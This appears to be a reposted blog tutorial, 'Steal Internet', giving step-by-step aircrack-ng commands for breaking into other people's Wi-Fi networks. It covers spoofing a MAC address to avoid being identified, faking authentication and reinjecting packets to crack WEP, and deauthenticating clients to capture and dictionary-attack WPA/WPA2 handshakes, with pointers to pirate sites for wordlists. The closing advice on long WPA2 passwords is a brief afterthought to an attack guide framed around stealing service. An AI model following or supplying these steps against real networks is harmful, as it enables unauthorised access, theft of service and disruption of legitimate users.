Steal Internet

                                                    Steal Internet

 

                                                                                         BY.MICKY VERMA

                          How to steal internet

Step 1 Spoofing a MAC Address

Before any smart cracker would attack your AP, they will always spoof their MAC (Media Access Control) address! Your MAC address is your wireless NIC's (Network Interface Card) unique identity! UNIQUE. That means if it was paid for with Mommy and Daddy's credit card, they'll know it's you behind the computer.

To spoof a MAC address, open a terminal and use these commands:

    sudo ifconfig wlan0 down
    sudo ifconfig wlan0 hw ether 46:75:63:6b:55:21
    sudo ifconfig wlan0 up

A frequent cracker would likely make a script out of this to do it quickly. You can put any hex number you want there for the MAC address you're spoofing to, mine is just an example.

To make sure your MAC changed, you would do:

    ifconfig

Then confirm that the "wlan0" interface matches what we put into the terminal.

Read Also-

• How to check Internet Speed.
• How to Access All Networks.

Step 2 Finding Your AP

To find your AP, do a scan of local wireless APs:

    sudo iwlist wlan0 scan

Take note of the MAC address of the access point, as well as the channel it is on, you will need it later.

Step 3 Install Aircrack-NG

Install the aircrack-ng suite. It contains all the tools needed to assess your AP's security. In Arch Linux, it is:

    sudo pacman -S aircrack-ng 

And Ubuntu:

    sudo apt-get install aircrack-ng

Now, install the aircrack-ng scripts, because sometimes you won't be able to run airmon-ng, etc. from the terminal without them:

    sudo pacman -S aircrack-ng-scripts

And Ubuntu

    sudo apt-get install aircrack-ng-scripts

• How to hack Wifi By Air crack NG.
• Wifi Dumper.

Step 4 Cracking the Wireless AP

Now we are going to start the actual attack on the AP. You will need to replace the text in brackets with your corresponding info, which you should have written down.

Put your wireless interface into monitor mode, as this will allow it to sniff traffic:

    sudo airmon-ng start wlan0

-OR-

    sudo ifconfig wlan0 mode monitor

Your interface for monitoring should now be named "mon0". 

If you have a WEP encrpyted network, refer to "Cracking WEP" below. If you have a WPA or WPA2 network, skip this and go straight to "Cracking WPA & WPA2".

Cracking WEP

For WEP encryption, we need to fake authentication with the AP so it sends you traffic (note: if you cant authenticate, spoof your MAC to match one of the clients already connected to it. You can see the under "stations" in airodump-ng). Open another tab in your terminal, and type:

    sudo aireplay-ng -a [AP's MAC] -e [AP's SSID(name)] mon0

To start the live capture of airbourne packets:

    sudo airodump-ng --ivs -c [channel of AP] --bssid [AP's MAC address] -w [~/Desktop] mon0

Next, you need to fake-authentication with the AP:

    sudo aireplay-ng -a [AP's MAC] -e [AP's ESSID(name)] mon0

When you have fake-authenticated successfully, you should now start re-injecting packets:

    sudo aireplay-ng -3 -b [AP's MAC] -h [Your MAC] mon0

When it's done, you should see it generating large amounts of traffic in the airodump-ng window. After you get 20-100,000 packets or "Data", as airodump calls them, you should be ready to crack the password.

To crack your password, run this in the terminal:

     sudo aircrack-ng ~/Desktop/[capture file.cap]

When aircrack says "KEY FOUND", copy the key and remove the semi-colons from it. Congratulations! You just proved how easy it is for someone to crack your network. With a crafted tool, an attacker can crack your network in less than 60 seconds. I've done it numerous times.

Cracking WPA & WPA2

To get ready to capture a four-way handshake, start airodump-ng with this command:

    sudo airodump-ng -c [channel of AP] --bssid [AP's MAC] -w [~/Desktop/psk.cap] mon0

Now we need to de-authenticate a client to force them to reconnect and get a four-way handshake faster. Swich to airodump and look at the associated clients (look at the bottom). Copy the MAC address. It there aren't any, wait until someone connects, or try for a later date when you can have another computer connected. Here is the terminal command to force de-authentication:

    sudo aireplay-ng -0 15 -a [AP MAC] -c [Deauth client MAC] mon0

In airodump, you should see in the top-right corner text, "WPA Handshake" and shows a MAC address following it. Example:

The handshake was captured and you can now disconnect from the network. If you didn't get the handshake, you might not be close enough to the client.

To crack the handshake:

    sudo aircrack-ng -w [~/path/to/dictionary/file.lst] [~/Desktop/psk-01.cap]

You can find great dictionaries for cracking on ThePirateBay or Packet Storm. I have over 20, depending on my situation. You can also use "coWPAtty", which usesRainbow Tables to crack WPA handshakes. Rainbow Tables are pre-computed hashes with their corresponding passphrase. It's very effective. The Church of Wi-Fihas the best Rainbow Table set I've seen. However, the torrents are impossible to find now (due to lack of seeders). In order to get them, you need to buy the DVD set.

That's all there is to it. So, the bottom line is to use WPA2 with AES encryption in conjunction with an impossibly long password, like "71zJJmfbK50VgdmtjRVJuxcDJr5PVJJAAtG1mIBwbEUshkkO".